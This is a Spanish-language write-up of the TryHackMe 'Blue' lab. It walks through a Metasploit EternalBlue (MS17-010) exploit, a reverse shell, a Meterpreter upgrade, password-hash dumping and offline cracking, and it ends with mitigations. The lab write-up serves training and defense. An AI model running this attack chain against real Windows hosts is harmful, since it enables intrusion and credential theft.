Share
## https://sploitus.com/exploit?id=FCF7CF2D-E166-5694-B9A9-DB4E6C6F323C
# 🛡️ TryHackMe CTF – EternalBlue (MS17-010)

![CTF Badge](https://img.shields.io/badge/CTF-TryHackMe-blue) ![Difficulty](https://img.shields.io/badge/Difficulty-Easy-red) ![OS](https://img.shields.io/badge/OS-Windows%207-lightgrey)

---

## 📄 Índice

- [🛡️ TryHackMe CTF – EternalBlue (MS17-010)](#️-tryhackme-ctf--eternalblue-ms17-010)
  - [📄 Índice](#-índice)
  - [1️⃣ Información General](#1️⃣-información-general)
  - [2️⃣ Objetivos](#2️⃣-objetivos)
  - [3️⃣ Reconocimiento](#3️⃣-reconocimiento)
    - [Escaneo de Servicios](#escaneo-de-servicios)
    - [Referencia Técnica](#referencia-técnica)
  - [4️⃣ Explotación](#4️⃣-explotación)
    - [Uso de Metasploit](#uso-de-metasploit)
  - [5️⃣ Post-Explotación](#5️⃣-post-explotación)
    - [Conversión a Meterpreter](#conversión-a-meterpreter)
    - [Enumeración y Migración](#enumeración-y-migración)
  - [6️⃣ Extracción de Credenciales](#6️⃣-extracción-de-credenciales)
    - [Dump de Hashes](#dump-de-hashes)
    - [Cracking Offline](#cracking-offline)
  - [7️⃣ Flags Obtenidas](#7️⃣-flags-obtenidas)
  - [8️⃣ Mitigación](#8️⃣-mitigación)
  - [9️⃣ Lecciones Aprendidas](#9️⃣-lecciones-aprendidas)
  - [🔟 Referencias](#-referencias)

---

## 1️⃣ Información General

![Eternal Blue](images/Eternal%20Blue.png)

- **Nombre de la máquina:** Blue
- **Plataforma:** TryHackMe
- **IP Objetivo:** `10.67.130.110`
- **Sistema Operativo:** Windows 7 SP1 x64
- **Vulnerabilidad principal:** EternalBlue (MS17-010)
- **Impacto:** Remote Code Execution (RCE)
- **Gravedad:** 🔴 Crítica

---

## 2️⃣ Objetivos

- Obtener acceso inicial al sistema objetivo.
- Escalar privilegios hasta SYSTEM.
- Extraer todas las flags del sistema.
- Documentar la vulnerabilidad y proponer mitigaciones.

---

## 3️⃣ Reconocimiento

### Escaneo de Servicios

```bash
nmap -sV --script vuln 10.67.130.110
```

![Nmap Scan](images/nmap-scan.png)

**Resultados clave:**

- SMBv1 habilitado en puerto 445
- Vulnerabilidad MS17-010 detectada
- Potencial vector de RCE

### Referencia Técnica

- **CVE:** CVE-2017-0144
- **Descripción:** Permite la ejecución remota de código mediante paquetes SMB maliciosos.

![Nmap Vulnerability Detection](images/nmap-vuln.png)

---

## 4️⃣ Explotación

### Uso de Metasploit

```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.67.130.110
set LPORT 4444
run
```

![Opciones EternalBlue](images/Opciones-eternal.png)

**Resultado:** shell reversa exitosa.

![Exploit Success](images/exploit.png)

---

## 5️⃣ Post-Explotación

### Conversión a Meterpreter

```bash
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
```

![Shell to Meterpreter](images/postmultimanageshell_to_meterpreter.png)

### Enumeración y Migración

```bash
sysinfo
getuid
ps
migrate 
```

- OS: Windows 7 SP1 x64
- Usuario: NT AUTHORITY\SYSTEM

![Process Migration](images/migrate.png)

---

## 6️⃣ Extracción de Credenciales

### Dump de Hashes

```bash
hashdump
```

![Hashdump](images/hashdump.png)

### Cracking Offline

- Herramienta: John the Ripper
- Usuario: Jon

![John the Ripper](images/john-ripper.png)

---

## 7️⃣ Flags Obtenidas

| Flag            | Ubicación                    | Evidencia                  |
|-----------------|------------------------------|----------------------------|
| **User Flag**   | `C:\`                        | ![Flag1](images/flag1.png) |
| **System Flag** | `C:\Windows\System32\config` | ![Flag2](images/flag2.png) |
| **Secret Flag** | `C:\Users\Jon\Documents`     | ![Flag3](images/flag3.png) |

---

## 8️⃣ Mitigación

1. **Deshabilitar SMBv1** – migrar a SMBv2/3.
2. **Aplicar parche MS17-010** – instalar la actualización oficial.
3. **Segmentación de red** – limitar acceso a puertos 139 y 445.
4. **Políticas de contraseñas robustas** – evitar ataques de cracking exitosos.

---

## 9️⃣ Lecciones Aprendidas

- Validar protocolos antiguos como SMBv1 es crítico.
- Nmap NSE es útil para identificar vulnerabilidades críticas.
- Flujo completo de explotación: Recon → Exploit → Post-Explotación → Escalada → Flags.

---

## 🔟 Referencias

- [CVE-2017-0144 – MITRE](https://vulners.com/cve/CVE-2017-0144)
- [Metasploit Framework](https://www.metasploit.com/)
- [John the Ripper](https://www.openwall.com/john/)